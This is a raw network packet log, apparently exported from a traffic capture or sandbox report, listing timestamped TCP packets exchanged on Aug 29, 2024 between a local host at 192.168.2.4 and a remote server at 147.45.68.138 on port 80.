                                                      Aug 29, 2024 22:52:29.435060978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516215086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516259909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516271114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516282082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516305923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516338110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516360998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516371965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516381979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516392946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516401052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516405106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516413927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516441107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516475916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516494036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516506910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516515970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516516924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516529083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516539097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516540051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516551971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516563892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516582012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516602993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516622066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516633987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516642094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516658068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516670942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516752958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516763926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516788960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516803026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516808033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516815901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516833067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516836882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516845942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516851902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516866922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516870022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516875029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516881943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516905069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516922951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.516937971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516949892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516954899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.516983032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517030954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517043114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517052889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517064095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517069101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517079115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517091036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517108917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517117023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517121077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517132998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517143011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517152071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517168999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517190933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517191887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517235041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517235994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517246962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517271042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517281055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517286062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517297983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517323017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517335892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517412901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517424107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517433882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517450094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517462969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517940044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517951012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517961025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.517977953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.517986059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518002033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518002987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518014908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518026114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518026114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518049002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518068075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518445969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518476009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518481970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518486023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518507957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518513918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518527031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518548965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518606901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518636942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518641949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518649101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518667936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518678904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518763065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518774033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518796921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518800020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518811941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518822908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518832922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518835068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518843889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518846989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518858910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518862963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518870115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518870115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518882990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518893003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.518898010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.518924952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519196987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519207001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519248962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519278049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519294024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519306898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519318104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519330025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519340038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519340038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519357920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519361973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519372940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519387960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519392967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519393921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519411087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519416094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519424915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519445896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519448042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519474983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519483089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519493103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519503117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519510984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519515038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.519520998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519531965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.519547939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520193100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520215988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520225048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520240068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520256996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520257950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520292997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520340919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520351887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520360947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520378113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520401955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520412922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520426035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520448923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520461082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520519018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520529985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520539999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520555973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520569086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520596027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520606995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520623922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520629883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520634890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520648003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520653963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520668983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520690918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520936966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520946980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520962000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520973921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520984888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.520987988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.520992041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521007061 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521012068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521023035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521023035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521049023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521064043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521182060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521193027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521203995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521218061 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521225929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521234035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521244049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521246910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521255016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521265984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521270990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521277905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521291018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521296978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521307945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521307945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521321058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521331072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521342039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521344900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521356106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521362066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521368980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521380901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521394968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521399021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521405935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521408081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521419048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521429062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521430969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.521444082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521457911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.521476984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.604270935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604285955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604296923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604348898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.604542017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604552984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604563951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604568958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604584932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.604599953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.604620934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605269909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605282068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605292082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605302095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605313063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605323076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605324030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605335951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605339050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605350018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605360985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605361938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605376959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605387926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605403900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605407000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605417967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605427980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605428934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605448008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605456114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605467081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605473042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605478048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605490923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605494022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605503082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605513096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605515003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605526924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605534077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605551004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605556011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605562925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605572939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605577946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605583906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605596066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605601072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605604887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605616093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605624914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605628014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605638981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605657101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605679989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605834007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605844975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605854988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605866909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605876923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605892897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605902910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605916977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605930090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605938911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605938911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605952024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605963945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605968952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605982065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.605990887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.605993032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606005907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606005907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606019020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606030941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606056929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606163979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606173038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606183052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606194019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606204987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606209993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606224060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606226921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606239080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606245041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606256962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606259108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606271029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606273890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606292009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606297970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606308937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606312990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606319904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606332064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606333971 CEST4973980192.168.2.4147.45.68.138
